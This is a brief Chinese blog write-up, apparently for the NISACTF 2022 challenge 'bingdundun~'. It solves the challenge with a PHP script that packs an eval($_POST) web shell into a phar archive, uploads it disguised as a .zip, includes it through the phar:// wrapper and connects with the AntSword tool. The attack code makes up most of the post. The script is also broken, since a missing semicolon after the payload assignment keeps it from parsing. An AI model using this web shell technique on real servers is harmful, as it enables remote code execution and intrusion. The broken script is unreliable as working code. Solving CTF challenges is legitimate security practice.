CHHHCHHOH 's BLOG

[NISACTF 2022]bingdundun~

phar伪协议解析文件
上传一个带有木马的.phar文件,改.zip上传

<?php
    $payload = '<?php eval($_POST["shell"]); ?>' 
    $phar = new Phar("webshell.phar"); 
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); 
    $phar->addFromString("webshell.php", "$payload"); 
    $phar->stopBuffering();
?>

file=phar://xxxxxxxxx.zip/webshell
因为题目会自动在后面加.php所以不用写。
然后用蚁剑连。

添加新评论